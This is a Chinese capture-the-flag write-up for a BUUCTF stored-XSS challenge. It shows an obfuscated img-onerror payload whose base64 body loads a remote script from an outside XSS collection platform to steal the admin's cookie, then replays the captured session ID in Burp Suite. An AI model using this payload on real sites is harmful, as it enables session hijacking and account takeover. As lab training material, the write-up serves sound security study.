【BUUCTF】BUU XSS COURSE 11

进入题目页面如下,有吐槽和登录两个可注入点

根据题目可知是一道XSS

登陆界面没有注册,尝试简单的SQL注入也不行

回到吐槽界面,输入简单的xss代码

<script>alert(1)</script>

访问网址,发现回显不出来,猜测是存储型xss,通过吐槽功能插入xss代码,获取cookie登录后台

可以使用下面这个平台,创建项目

​​​​​​XSS安全平台

复制代码
'"><img src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vdWouY2kvZXplIjtkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKGEpOw== onerror=eval(atob(this.id))>

获取到了 cookie : PHPSESSID=37fe83cc4c3fe53c0686b2029c4cab43

后台路径 http://web/backend/admin.php

根据提示构造url并访问

4276ae11-be9b-4384-bfae-75839de9d1b2.node5.buuoj.cn:81/backend/admin.php

还没改cookie qyq

在burp suite中改cookie值并放行

再次访问,最终得到flag

相关推荐
介一安全21 小时前
【APK安全】Android 权限校验核心风险与防御指南
网络安全·安全性测试·apk安全
A9better21 小时前
嵌入式开发学习日志32——stm32之PWM
stm32·单片机·嵌入式硬件·学习
快码加编~1 天前
无法解析插件 org.apache.maven.plugins:maven-site-plugin:3.12.1
java·学习·maven·intellij-idea
托比-马奎尔1 天前
Maven学习
java·学习·maven
安当加密1 天前
CAS密钥管理系统在汽车行业的核心密钥管理实践——构建智能网联汽车的可信安全底座
网络·安全·汽车
upgrador1 天前
Linux内核与设备管理:USB存储驱动usb_storage/uas的安全卸载与复原
linux·运维·安全
海梨花1 天前
【从零开始学习RabbitMQ】
分布式·学习·rabbitmq
andyguo1 天前
AI模型测评平台工程化实战十二讲(第五讲:大模型测评分享功能:安全、高效的结果展示与协作)
人工智能·安全·c#
程序员大雄学编程1 天前
「机器学习笔记2」机器学习系统设计:从理论到实践
人工智能·笔记·机器学习
魏郴1 天前
外卖项目技术亮点总结笔记
笔记